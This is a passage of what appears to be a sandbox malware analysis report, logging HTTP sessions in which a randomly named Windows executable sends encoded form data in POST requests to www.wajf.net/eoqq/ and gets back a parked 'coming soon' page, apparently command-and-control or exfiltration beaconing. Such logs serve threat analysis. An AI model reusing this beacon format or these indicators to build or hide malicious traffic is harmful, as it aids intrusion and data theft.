[TRUNCATED]
Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
Oct 8, 2024 15:36:31.833519936 CEST | 1236 | IN | Data Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
Oct 8, 2024 15:36:31.833544016 CEST | 1236 | IN | Data Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
Oct 8, 2024 15:36:31.833554983 CEST | 1236 | IN | Data Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
Oct 8, 2024 15:36:31.833578110 CEST | 1236 | IN | Data Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
Oct 8, 2024 15:36:31.833610058 CEST | 1236 | IN | Data Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
Oct 8, 2024 15:36:31.833632946 CEST | 1236 | IN | Data Raw: 2d 31 2e 37 36 31 2e 34 32 33 39 32 4c 34 35 33 2e 34 31 38 35 35 2c 33 30 2e 34 30 38 35 33 61 31 2e 32 35 34 32 33 2c 31 2e 32 35 34 32 33 2c 30 2c 30 2c 31 2d 2e 34 35 36 39 2d 31 2e 37 30 33 37 38 6c 32 2e 38 36 35 31 39 2d 34 2e 39 36 36 33
Data Ascii: -1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.19448,12.81733A1.30449,1.30449,0,0,1,480.24559,37.83394Z" class="cls-2"></path><path d="M490.17148,30.00412l-4.96463,2.
Oct 8, 2024 15:36:31.833647966 CEST | 1236 | IN | Data Raw: 2e 35 38 37 34 2c 35 2e 35 38 37 34 2c 30 2c 30 2c 31 2c 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 32 2e 38 31 36 34 39 2c 31
Data Ascii: .5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,
Oct 8, 2024 15:36:31.833668947 CEST | 1236 | IN | Data Raw: 33 34 33 32 39 63 31 37 2e 36 39 31 34 36 2c 30 2c 32 38 2e 31 33 37 38 34 2c 39 2e 30 35 35 31 37 2c 32 38 2e 31 33 37 38 34 2c 32 36 2e 36 30 35 36 35 76 35 30 2e 30 30 35 32 39 41 32 2e 38 30 34 33 36 2c 32 2e 38 30 34 33 36 2c 30 2c 30 2c 31
Data Ascii: 34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"></path><path d="M344.50486,117.228H299.0941v.42056c0,8.07577,3.345,17.68641,16.71576,17.68641,10.16713,0,19.78114-.83473,25.
Oct 8, 2024 15:36:31.833697081 CEST | 1236 | IN | Data Raw: 31 31 32 35 36 76 35 2e 32 37 39 38 38 63 30 2c 2e 38 31 31 38 34 2d 2e 36 34 37 33 33 2c 31 2e 32 31 35 39 32 2d 31 2e 34 35 38 38 34 2c 31 2e 32 31 35 39 32 68 2d 2e 32 34 36 32 38 61 37 30 2e 33 35 35 33 35 2c 37 30 2e 33 35 35 33 35 2c 30 2c
Data Ascii: 11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988,2.1849-7.79988,10.6422v7.557c0,8.45056,3.9822,10.64186,7.79988,10.64186a70.19544,70.19544,0,0,0,10.48137-.56826h.24628c.81
Oct 8, 2024 15:36:31.834307909 CEST | 421 | IN | Data Raw: 31 2e 36 33 38 32 34 2c 30 2c 30 2c 31 2d 31 2e 35 34 37 33 33 2d 31 2e 37 31 31 38 35 56 31 31 39 2e 32 32 35 34 38 63 30 2d 31 30 2e 32 33 39 38 31 2c 36 2e 30 39 34 37 36 2d 31 35 2e 35 32 31 33 38 2c 31 36 2e 34 31 31 36 31 2d 31 35 2e 35 32
Data Ascii: 1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.72429,3.25111,2.51663-2.193,6.25256-3.25111,10.80638-3.25111h1.9514c10.31719,0,16.412,5.28157,16.412,15.52138v29.16333A1.63


Session ID: 38 | Source IP: 192.168.2.9 | Source Port: 60853 | Destination IP: 3.91.127.116 | Destination Port: 80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:36:33.909727097 CEST | 743 | OUT | POST /eoqq/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.wajf.net
Origin: http://www.wajf.net
Cache-Control: max-age=0
Content-Length: 217
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.wajf.net/eoqq/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 62 64 79 74 34 6e 39 61 44 55 49 66 30 30 70 36 33 73 41 49 47 63 68 35 64 35 55 7a 62 6a 41 59 74 74 68 34 73 64 46 66 41 77 68 4d 6b 79 47 50 72 69 75 37 6c 39 35 33 78 78 64 4a 78 4a 6f 74 58 36 65 69 46 38 62 4f 78 59 6f 48 70 7a 6c 68 34 53 77 69 44 47 7a 56 6c 46 6f 65 49 67 73 51 45 62 41 2b 69 71 39 61 55 53 67 41 6c 49 73 64 69 6c 78 52 50 46 6f 6a 56 64 43 4d 38 45 73 7a 6b 6f 79 44 35 72 6d 43 74 67 69 45 76 48 58 35 64 66 56 79 55 6f 4f 61 34 34 64 67 71 68 30 42 4c 77 45 6a 57 77 58 68 79 53 71 73 6f 4c 54 32 70 72 30 6f 32 51 6b 75 67 7a 34 57 77 33 38 79 54 6d 36 61 2b 7a 52 39 36 5a 77 65 67 34 55 63 46 41 3d 3d
Data Ascii: tpTd=bdyt4n9aDUIf00p63sAIGch5d5UzbjAYtth4sdFfAwhMkyGPriu7l953xxdJxJotX6eiF8bOxYoHpzlh4SwiDGzVlFoeIgsQEbA+iq9aUSgAlIsdilxRPFojVdCM8EszkoyD5rmCtgiEvHX5dfVyUoOa44dgqh0BLwEjWwXhySqsoLT2pr0o2Qkugz4Ww38yTm6a+zR96Zweg4UcFA==
Oct 8, 2024 15:36:34.378201962 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:36:34 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
Oct 8, 2024 15:36:34.378263950 CEST | 1236 | IN | Data Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
Oct 8, 2024 15:36:34.378325939 CEST | 1236 | IN | Data Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
Oct 8, 2024 15:36:34.378415108 CEST | 1236 | IN | Data Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
Oct 8, 2024 15:36:34.378465891 CEST | 1236 | IN | Data Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
Oct 8, 2024 15:36:34.378513098 CEST | 1236 | IN | Data Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
Oct 8, 2024 15:36:34.378559113 CEST | 1236 | IN | Data Raw: 2d 31 2e 37 36 31 2e 34 32 33 39 32 4c 34 35 33 2e 34 31 38 35 35 2c 33 30 2e 34 30 38 35 33 61 31 2e 32 35 34 32 33 2c 31 2e 32 35 34 32 33 2c 30 2c 30 2c 31 2d 2e 34 35 36 39 2d 31 2e 37 30 33 37 38 6c 32 2e 38 36 35 31 39 2d 34 2e 39 36 36 33
Data Ascii: -1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.19448,12.81733A1.30449,1.30449,0,0,1,480.24559,37.83394Z" class="cls-2"></path><path d="M490.17148,30.00412l-4.96463,2.
Oct 8, 2024 15:36:34.378607035 CEST | 1236 | IN | Data Raw: 2e 35 38 37 34 2c 35 2e 35 38 37 34 2c 30 2c 30 2c 31 2c 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 32 2e 38 31 36 34 39 2c 31
Data Ascii: .5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,
Oct 8, 2024 15:36:34.378653049 CEST | 1236 | IN | Data Raw: 33 34 33 32 39 63 31 37 2e 36 39 31 34 36 2c 30 2c 32 38 2e 31 33 37 38 34 2c 39 2e 30 35 35 31 37 2c 32 38 2e 31 33 37 38 34 2c 32 36 2e 36 30 35 36 35 76 35 30 2e 30 30 35 32 39 41 32 2e 38 30 34 33 36 2c 32 2e 38 30 34 33 36 2c 30 2c 30 2c 31
Data Ascii: 34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"></path><path d="M344.50486,117.228H299.0941v.42056c0,8.07577,3.345,17.68641,16.71576,17.68641,10.16713,0,19.78114-.83473,25.
Oct 8, 2024 15:36:34.378703117 CEST | 1236 | IN | Data Raw: 31 31 32 35 36 76 35 2e 32 37 39 38 38 63 30 2c 2e 38 31 31 38 34 2d 2e 36 34 37 33 33 2c 31 2e 32 31 35 39 32 2d 31 2e 34 35 38 38 34 2c 31 2e 32 31 35 39 32 68 2d 2e 32 34 36 32 38 61 37 30 2e 33 35 35 33 35 2c 37 30 2e 33 35 35 33 35 2c 30 2c
Data Ascii: 11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988,2.1849-7.79988,10.6422v7.557c0,8.45056,3.9822,10.64186,7.79988,10.64186a70.19544,70.19544,0,0,0,10.48137-.56826h.24628c.81
Oct 8, 2024 15:36:34.378997087 CEST | 421 | IN | Data Raw: 31 2e 36 33 38 32 34 2c 30 2c 30 2c 31 2d 31 2e 35 34 37 33 33 2d 31 2e 37 31 31 38 35 56 31 31 39 2e 32 32 35 34 38 63 30 2d 31 30 2e 32 33 39 38 31 2c 36 2e 30 39 34 37 36 2d 31 35 2e 35 32 31 33 38 2c 31 36 2e 34 31 31 36 31 2d 31 35 2e 35 32
Data Ascii: 1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.72429,3.25111,2.51663-2.193,6.25256-3.25111,10.80638-3.25111h1.9514c10.31719,0,16.412,5.28157,16.412,15.52138v29.16333A1.63


Session ID: 39 | Source IP: 192.168.2.9 | Source Port: 60854 | Destination IP: 3.91.127.116 | Destination Port: 80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:36:36.457803011 CEST | 1756 | OUT | POST /eoqq/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.wajf.net
Origin: http://www.wajf.net
Cache-Control: max-age=0
Content-Length: 1229
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.wajf.net/eoqq/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 62 64 79 74 34 6e 39 61 44 55 49 66 30 30 70 36 33 73 41 49 47 63 68 35 64 35 55 7a 62 6a 41 59 74 74 68 34 73 64 46 66 41 77 35 4d 6e 41 4f 50 70 41 47 37 6d 39 35 33 2f 52 64 4d 78 4a 70 78 58 36 57 75 46 38 58 30 78 61 67 48 76 51 39 68 39 6e 63 69 4e 47 7a 56 73 6c 6f 66 4d 67 73 2f 45 62 77 36 69 75 68 61 55 53 67 41 6c 4a 38 64 6e 41 64 52 4a 46 6f 67 44 74 43 59 34 45 74 63 6b 73 58 30 35 6f 4b 30 73 55 75 45 76 6a 4c 35 51 4a 35 79 64 6f 4f 69 2f 34 63 6d 71 68 6f 67 4c 30 6b 46 57 7a 4c 62 79 53 53 73 72 4e 79 65 75 61 34 65 6e 69 6b 6b 6e 52 4e 77 32 44 41 69 64 6e 6e 38 73 68 4e 62 37 49 4a 36 75 4b 64 67 58 5a 72 4c 34 47 51 4c 35 70 2b 70 6b 4c 6d 68 51 74 70 51 4e 45 67 43 41 41 42 58 50 56 6f 6b 62 6c 39 65 30 44 4b 46 39 6e 63 45 43 68 32 4d 50 42 49 47 33 4d 59 46 70 64 68 45 32 50 32 70 34 53 76 74 52 36 4a 30 35 36 5a 38 6d 58 67 2b 76 5a 69 77 7a 47 34 32 63 6a 4e 52 57 62 61 6f 72 33 43 4a 35 4e 6e 47 7a 59 34 57 63 46 59 7a 70 77 50 4b 64 41 70 63 59 7a 2b 59 2f [TRUNCATED]
Data Ascii: tpTd=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 [TRUNCATED]
Oct 8, 2024 15:36:36.958839893 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:36:36 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
Oct 8, 2024 15:36:36.958864927 CEST | 1236 | IN | Data Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
Oct 8, 2024 15:36:36.958897114 CEST | 1236 | IN | Data Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
Oct 8, 2024 15:36:36.958915949 CEST | 1236 | IN | Data Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
Oct 8, 2024 15:36:36.958930016 CEST | 1236 | IN | Data Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
Oct 8, 2024 15:36:36.958949089 CEST | 1236 | IN | Data Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
Oct 8, 2024 15:36:36.958982944 CEST | 1236 | IN | Data Raw: 2d 31 2e 37 36 31 2e 34 32 33 39 32 4c 34 35 33 2e 34 31 38 35 35 2c 33 30 2e 34 30 38 35 33 61 31 2e 32 35 34 32 33 2c 31 2e 32 35 34 32 33 2c 30 2c 30 2c 31 2d 2e 34 35 36 39 2d 31 2e 37 30 33 37 38 6c 32 2e 38 36 35 31 39 2d 34 2e 39 36 36 33
Data Ascii: -1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.19448,12.81733A1.30449,1.30449,0,0,1,480.24559,37.83394Z" class="cls-2"></path><path d="M490.17148,30.00412l-4.96463,2.
Oct 8, 2024 15:36:36.959006071 CEST | 1236 | IN | Data Raw: 2e 35 38 37 34 2c 35 2e 35 38 37 34 2c 30 2c 30 2c 31 2c 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 32 2e 38 31 36 34 39 2c 31
Data Ascii: .5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,
